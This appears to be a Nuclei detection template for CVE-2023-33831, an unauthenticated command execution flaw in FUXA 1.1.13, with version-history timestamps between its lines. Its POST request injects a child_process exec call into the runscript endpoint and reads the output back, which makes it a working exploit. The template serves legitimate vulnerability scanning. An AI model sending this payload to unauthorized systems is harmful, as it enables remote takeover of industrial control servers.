2023-10-01 16:19:18 +00:00
id : CVE-2023-33831
info :
name : FUXA - Unauthenticated Remote Code Execution
author : gy741
severity : critical
description : |
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-33831
- https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-33831
cwe-id : CWE-77
2023-10-14 11:27:55 +00:00
epss-score : 0.03756
2023-10-19 10:38:59 +00:00
epss-percentile : 0.9076
2023-10-01 16:19:18 +00:00
cpe : cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:*
2023-10-01 19:17:23 +00:00
metadata :
verified : "true"
2023-10-14 11:27:55 +00:00
max-request : 2
vendor : frangoteam
product : fuxa
fofa-query : title="FUXA"
2023-10-03 06:43:22 +00:00
tags : cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth
2023-10-01 19:17:23 +00:00
variables :
filename : "{{rand_base(6)}}"
2023-10-01 16:19:18 +00:00
http :
- raw :
- |
POST /api/runscript HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2023-10-01 19:17:23 +00:00
{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')" }}}
2023-10-01 16:19:18 +00:00
- |
2023-10-01 19:17:23 +00:00
GET /_images/{{filename}} HTTP/1.1
2023-10-01 16:19:18 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2023-10-01 19:17:23 +00:00
part : body_1
words :
- 'Script OK:'
- type : word
part : body_2
2023-10-01 16:19:18 +00:00
words :
- 'uid'
- 'gid'
- 'groups'
condition : and
- type : status
status :
- 200
2023-10-19 13:13:52 +00:00
# digest: 4b0a004830460221008253daa8c81da1684778dca0d422c2d6f9a84fc3b419bdff3a0fe62165f959c00221009def1d5be546c6d662952c9e3234d205b94d53c81733206b62ef19c8e461db82:922c64590222798bb761d5b6d8e72950